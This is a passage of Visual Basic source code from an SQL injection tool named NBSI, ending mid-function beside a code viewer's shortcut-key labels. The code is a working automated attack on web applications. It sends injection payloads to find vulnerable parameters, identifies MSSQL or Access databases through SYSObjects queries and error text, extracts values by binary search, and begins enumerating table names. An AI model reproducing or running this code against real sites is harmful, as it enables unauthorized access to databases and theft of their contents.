📄 main.frm
字号:
Pos = InStr(ResultArray(1), "varchar")
If InStr(ResultArray(0), HTTP_500_INC) > 0 And Pos > 0 Then
Pos_CRLF = InStr(Pos, ResultArray(1), vbLf)
LineStr = Mid(ResultArray(1), Pos, Pos_CRLF - Pos)
If InStr(LineStr, " and user+char(124)") = 0 Then
FunDecide_Method = 21
Exit Function
End If
End If
ResultArray = CommonGetHTTPHeadAndBody(URL_Source & "%25' and user%2Bchar(124)>0 and '%25'='")
Pos = InStr(ResultArray(1), "varchar")
If InStr(ResultArray(0), HTTP_500_INC) > 0 And Pos > 0 Then
Pos_CRLF = InStr(Pos, ResultArray(1), vbLf)
LineStr = Mid(ResultArray(1), Pos, Pos_CRLF - Pos)
If InStr(LineStr, " and user+char(124)") = 0 Then
FunDecide_Method = 31
Exit Function
End If
End If
Inject_Method = FunInject_Method(URL_Source)
If Inject_Method = 0 Then
FunDecide_Method = 0
Else
FunDecide_Method = 1
OptInject_Method(Inject_Method - 1).Enabled = True
OptInject_Method(Inject_Method - 1).Value = True
End If
Exit Function
End Function
Public Function FunDecide_Method_ByKeyword(ByVal URL_Source As String, ByVal KeyWord As String) As Integer
ResultNumTrue = CommonGetHTTPBody(URL_Source & " And 1=1")
ResultStrTrue = CommonGetHTTPBody(URL_Source & "' And ''='")
ResultSchTrue = CommonGetHTTPBody(URL_Source & "%25' And '%25'='")
ResultNumFalse = CommonGetHTTPBody(URL_Source & " And 1=2")
ResultStrFalse = CommonGetHTTPBody(URL_Source & "' And 'FALSE'=")
ResultSchFalse = CommonGetHTTPBody(URL_Source & "%25' And ''=")
If (InStr(ResultNumTrue, KeyWord) > 0 Or InStr(ResultStrTrue, KeyWord) > 0 Or InStr(ResultSchTrue, KeyWord) > 0) And _
(InStr(ResultNumFalse, KeyWord) = 0 Or InStr(ResultStrFalse, KeyWord) = 0 Or InStr(ResultSchFalse, KeyWord) = 0) Then
FunDecide_Method_ByKeyword = 2
Else
FunDecide_Method_ByKeyword = 0
End If
End Function
'----------------------------------------------------------------------------------------------
' Step 2: Inject_Method
'----------------------------------------------------------------------------------------------
Public Function FunInject_Method(ByVal URL_Source As String) As Integer
FunInject_Method = 0
ResultTrue = CommonGetHTTPHead(URL_Source & " And 1=1")
ResultFalse = CommonGetHTTPHead(URL_Source & " And 1=2")
If InStr(ResultTrue, HTTP_200_INC) > 0 And InStr(ResultFalse, HTTP_500_INC) > 0 Then
FunInject_Method = 1
Exit Function
End If
ResultTrue = CommonGetHTTPHead(URL_Source & "' And 1=1 And ''='")
ResultFalse = CommonGetHTTPHead(URL_Source & "' And 1=2 And ''='")
If InStr(ResultTrue, HTTP_200_INC) > 0 And InStr(ResultFalse, HTTP_500_INC) > 0 Then
FunInject_Method = 2
Exit Function
End If
ResultTrue = CommonGetHTTPHead(URL_Source & "%25' And 1=1 And '%25'='")
ResultFalse = CommonGetHTTPHead(URL_Source & "%25' And 1=2 And '%25'='")
If InStr(ResultTrue, HTTP_200_INC) > 0 And InStr(ResultFalse, HTTP_500_INC) > 0 Then
FunInject_Method = 3
Exit Function
End If
End Function
Public Function FunInject_Method_ByKeyword(ByVal URL_Source As String, ByVal KeyWord As String) As Integer
ResultTrue = CommonGetHTTPBody(URL_Source & " And 1=1")
ResultFalse = CommonGetHTTPBody(URL_Source & " And 1=2")
If (InStr(ResultTrue, KeyWord) > 0 And InStr(ResultFalse, KeyWord) = 0) Then
FunInject_Method_ByKeyword = 1
Exit Function
End If
ResultTrue = CommonGetHTTPBody(URL_Source & "' And 1=1 And ''='")
ResultFalse = CommonGetHTTPBody(URL_Source & "' And 1=2 And ''='")
If (InStr(ResultTrue, KeyWord) > 0 And InStr(ResultFalse, KeyWord) = 0) Then
FunInject_Method_ByKeyword = 2
Exit Function
End If
ResultTrue = CommonGetHTTPBody(URL_Source & "%25' And 1=1 And '%25'='")
ResultFalse = CommonGetHTTPBody(URL_Source & "%25' And 1=2 And '%25'='")
If (InStr(ResultTrue, KeyWord) > 0 And InStr(ResultFalse, KeyWord) = 0) Then
FunInject_Method_ByKeyword = 3
Exit Function
End If
End Function
'----------------------------------------------------------------------------------------------
' Step 3: Database_Type
'----------------------------------------------------------------------------------------------
Public Function FunDatabase_Type(ByVal URL_Source As String, ByVal Decide_Method As Integer, ByVal Inject_Method As Integer) As Integer
If Inject_Method = 1 Then
Result200 = CommonGetHTTPHead(URL_Source & " And (Select Count(1) from SYSObjects)>0")
ElseIf Inject_Method = 2 Then
Result200 = CommonGetHTTPHead(URL_Source & "' And (Select Count(1) from SYSObjects)>0 And ''='")
ElseIf Inject_Method = 3 Then
Result200 = CommonGetHTTPHead(URL_Source & "%25' And (Select Count(1) from SYSObjects)>0 And '%25'='")
End If
If InStr(Result200, HTTP_200_INC) > 0 Then
If Inject_Method = 1 Then
Result500 = CommonGetHTTPBody(URL_Source & " And (Select Top 1 char(65) from SYSObjects)>0")
ElseIf Inject_Method = 2 Then
Result500 = CommonGetHTTPBody(URL_Source & "' And (Select Top 1 char(65) from SYSObjects)>0 And ''='")
ElseIf Inject_Method = 3 Then
Result500 = CommonGetHTTPBody(URL_Source & "%25' And (Select Top 1 char(65) from SYSObjects)>0 And '%25'='")
End If
If InStr(Result500, "varchar") > 0 Then
FunDatabase_Type = 1
Else
FunDatabase_Type = 2
End If
Else
FunDatabase_Type = 3
End If
End Function
Public Function FunDatabase_Type_ByKeyword(ByVal URL_Source As String, ByVal Decide_Method As Integer, ByVal Inject_Method As Integer) As Integer
If Inject_Method = 1 Then
Result200 = CommonGetHTTPBody(URL_Source & " And (Select Count(1) from SYSObjects)>0")
ElseIf Inject_Method = 2 Then
Result200 = CommonGetHTTPBody(URL_Source & "' And (Select Count(1) from SYSObjects)>0 And ''='")
ElseIf Inject_Method = 3 Then
Result200 = CommonGetHTTPBody(URL_Source & "%25' And (Select Count(1) from SYSObjects)>0 And '%25'='")
End If
If (InStr(Result200, KeyWord) > 0) Then
FunDatabase_Type_ByKeyword = 2
Else
FunDatabase_Type_ByKeyword = 3
End If
End Function
Private Function CommonCheckStr(ByVal URL_Check As String) As String
If Decide_Method = 1 Then
ResultTrue = CommonGetHTTPHead(URL_Check)
Return_Value = IIf(InStr(ResultTrue, HTTP_200_INC) > 0, True, False)
Else
ResultTrue = CommonGetHTTPBody(URL_Check)
Return_Value = IIf(InStr(ResultTrue, KeyWord) > 0, True, False)
End If
CommonCheckStr = Return_Value
End Function
Private Function CommonGetChar(ByVal URL_Check As String, MinV, MaxV) As String
Do While True
AvgV = Int((MaxV + MinV) / 2)
If CommonCheckStr(URL_Check & ">" & CStr(AvgV) & URL_Check_End) Then
If MaxV - AvgV = 1 Then
CommonGetChar = MaxV
Exit Do
End If
MinV = AvgV + 1
Else
If MaxV - AvgV = 1 Then
CommonGetChar = AvgV
Exit Do
End If
MaxV = AvgV
End If
Loop
End Function
'----------------------------------------------------------------------------------------------
' Get Result by URL
'----------------------------------------------------------------------------------------------
Private Sub iNet_StateChanged(ByVal State As Integer)
If State = icResponseCompleted Then
ReturnBody = iNet.GetChunk(102400)
ReturnHead = iNet.GetHeader
End If
End Sub
Public Function CommonGetHTTPHead(ByVal URL_Check As String) As String
On Error Resume Next
If iNet2.StillExecuting Then
Call MsgBox("上次的检测仍在执行中,请稍后再试!", 48, "NBSI提示信息")
Exit Function
End If
If MethodGet.Value = True Then
iNet2.Execute (URL_Check), "HEAD"
Do While True
DoEvents
If Not iNet2.StillExecuting Then
CommonGetHTTPHead = iNet2.GetHeader
Exit Do
End If
Loop
Else
Pos = InStr(URL_Check, "?")
PosAnd = InStrRev(URL_Check, "&")
If PosAnd > 0 Then
PostURL = Left(URL_Check, PosAnd - 1)
PostPara = Mid(URL_Check, PosAnd + 1)
ElseIf Pos > 0 Then
PostURL = Left(URL_Check, Pos - 1)
PostPara = Mid(URL_Check, Pos + 1)
End If
PostPara = Replace(PostPara, " ", "%20")
iNet2.Execute CStr(PostURL), "Post", CStr(PostPara), "Content-Type: application/x-www-form-urlencoded"
Do While True
DoEvents
If Not iNet2.StillExecuting Then
CommonGetHTTPHead = iNet2.GetHeader
Exit Do
End If
Loop
End If
On Error GoTo 0
Progress.Text = URL_Check & vbCrLf & Progress.Text
ProgressBar.Value = IIf(ProgressBar.Value >= 100, 10, ProgressBar.Value + 10)
End Function
Public Function CommonGetHTTPBody(ByVal URL_Check As String) As String
On Error Resume Next
ReturnBody = ""
Do While True
DoEvents
If Not iNet.StillExecuting Then Exit Do
Loop
If iNet.StillExecuting Then
Call MsgBox("上次的检测仍在执行中,请稍后再试!", 48, "NBSI提示信息")
Exit Function
End If
If MethodGet.Value = True Then
CommonGetHTTPBody = iNet.OpenURL(URL_Check)
Else
Pos = InStr(URL_Check, "?")
PosAnd = InStrRev(URL_Check, "&")
If PosAnd > 0 Then
PostURL = Left(URL_Check, PosAnd - 1)
PostPara = Mid(URL_Check, PosAnd + 1)
ElseIf Pos > 0 Then
PostURL = Left(URL_Check, Pos - 1)
PostPara = Mid(URL_Check, Pos + 1)
End If
PostPara = Replace(PostPara, " ", "%20")
iNet.Execute CStr(PostURL), "Post", CStr(PostPara), "Content-Type: application/x-www-form-urlencoded"
Do While True
DoEvents
If ReturnBody > "" And Not iNet.StillExecuting Then
CommonGetHTTPBody = ReturnBody
Exit Do
End If
Loop
End If
On Error GoTo 0
Progress.Text = URL_Check & vbCrLf & Progress.Text
ProgressBar.Value = IIf(ProgressBar.Value >= 100, 10, ProgressBar.Value + 10)
End Function
Public Function CommonGetHTTPHeadAndBody(ByVal URL_Check As String) As Variant
On Error Resume Next
ReturnBody = ""
ReturnHead = ""
Do While True
DoEvents
If Not iNet.StillExecuting Then Exit Do
Loop
If iNet.StillExecuting Then
Call MsgBox("上次的检测仍在执行中,请稍后再试!", 48, "NBSI提示信息")
Exit Function
End If
If MethodGet.Value = True Then
HTTPBody = iNet.OpenURL(URL_Check)
HTTPHead = iNet.GetHeader
Else
Pos = InStr(URL_Check, "?")
PosAnd = InStrRev(URL_Check, "&")
If PosAnd > 0 Then
PostURL = Left(URL_Check, PosAnd - 1)
PostPara = Mid(URL_Check, PosAnd + 1)
ElseIf Pos > 0 Then
PostURL = Left(URL_Check, Pos - 1)
PostPara = Mid(URL_Check, Pos + 1)
End If
PostPara = Replace(PostPara, " ", "%20")
iNet.Execute CStr(PostURL), "Post", CStr(PostPara), "Content-Type: application/x-www-form-urlencoded"
Do While True
DoEvents
If ReturnBody > "" And ReturnHead > "" And Not iNet.StillExecuting Then
HTTPBody = ReturnBody
HTTPHead = ReturnHead
Exit Do
End If
Loop
End If
Dim HTTPArray(1)
HTTPArray(0) = HTTPHead
HTTPArray(1) = HTTPBody
CommonGetHTTPHeadAndBody = HTTPArray
On Error GoTo 0
Progress.Text = URL_Check & vbCrLf & Progress.Text
ProgressBar.Value = IIf(ProgressBar.Value >= 100, 10, ProgressBar.Value + 10)
End Function
Public Function URLEncode(ByVal strInput As String) As String
For i = 1 To Len(strInput)
intAscii = Asc(Mid(strInput, i, 1))
If (intAscii < 58 And intAscii > 47) Or (intAscii < 91 And intAscii > 64) Or (intAscii < 123 And intAscii > 96) Then
strOutput = strOutput & Chr$(intAscii)
Else
strOutput = strOutput & IIf(intAscii < 16, "%0", "%") & Trim$(Hex$(intAscii))
End If
Next
URLEncode = strOutput
End Function
Public Function SQLUnicode(ByVal strInput As String) As String
If strInput = "" Then Exit Function
For i = 1 To Len(strInput)
intAscii = AscW(Mid(strInput, i, 1))
strOutput = strOutput & "NCHAR(" & intAscii & ")%2B"
Next
SQLUnicode = Left(strOutput, Len(strOutput) - 3)
End Function
'----------------------------------------------------------------------------------------------
' Step 4: TableName
'----------------------------------------------------------------------------------------------
Private Function FunGet_TableName(ByVal URL_Source As String) As String
If Database_Type = 1 Then
Do While True
TableNO = TableNO + 1
If Inject_Method = 1 Then
URL_Check = URL_Source & " And (Select Top 1 cast(name as varchar(8000)) from(Select Top " & TableNO & " id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0"
ElseIf Inject_Method = 2 Then
URL_Check = URL_Source & ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -